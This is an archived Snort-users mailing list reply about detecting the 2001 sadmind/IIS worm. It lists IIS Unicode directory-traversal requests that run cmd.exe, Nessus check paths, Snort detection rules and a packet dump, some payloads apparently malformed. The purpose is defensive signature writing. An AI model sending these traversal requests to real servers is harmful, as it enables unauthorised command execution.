Re: sadmind rule

[Polar Bear <polus2000 () yahoo com>]

Hi all,

The combination of these two rules is great.
Also we can run Nessus against all/suspected hosts
using GUI or from command line/script:
 
nasl -t host.in.question 
/usr/lib/nessus/plugins/iis_dir_traversal.nasl

or do it all manually.
(here is what sadmin/iis worm sends
although i'm not sure , haven't seen the code 
compiled from different sources):

GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dirHTTP/1.0

GET
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0

GET
/online/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0
GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0
GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.1
GET
/scripts/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0
GET
/msadc/..%e0%80%afq../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+..\
HTTP/1.0
GET
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0


Nessus does 5 checks (do we need to add more?):


/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\


Zh.

---
On Wed, 9 May 2001, Andrew Daviel wrote:
> We were just hit by the sadmind/IIS worm
> http://www.cert.org/advisories/CA-2001-11.html
>
> I've been trying to retroactively find what might
have been actually
> attacked buried in all the port 80 traffic
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:
"sadmind"; flags: PA;
> content: "GET /scripts/root.exe"; )


It's also nice to have a generic rule that looks for
IIS boxes
responding to the "dir" requests with an actual
directory listing.
For example something like:

alert tcp $INTERNAL 80 -> $EXTERNAL any (msg:
"Directory listing response - possible vulnerable
IIS"; flags: AP; content: "|20 44 69 72 65 63 74 6F 72
79 20 6F 66|"; depth: 13;)


...which may catch something like:

VULN_IIS:80 -> ATTACKER:41742 TCP TTL:127 TOS:0x0
ID:33953
IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xDF622603  Ack: 0xF95527CF  Win: 0x4411
 TcpLen: 20
20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 63 3A  
Directory of c:
5C 70 72 6F 67 72 61 6D 20 66 69 6C 65 73 5C 63 
\program files\c
6F 6D 6D 6F 6E 20 66 69 6C 65 73 5C 73 79 73 74  ommon
files\syst
65 6D 5C 6D 73 61 64 63 0D 0A 0D 0A 32 30 30 30 
em\msadc....2000
2D 31 30 2D 30 39 20 20 30 39 3A 32 39 20 20 20 
-10-09  09:29
20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 20 20     
<DIR>
20 20 20 2E 0D 0A 32 30 30 30 2D 31 30 2D 30 39    
...2000-10-09
...


Regards,
Andreas Östling

__________________________________________________
Do You Yahoo!?
Yahoo! Auctions - buy the things you want at great prices
http://auctions.yahoo.com/

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users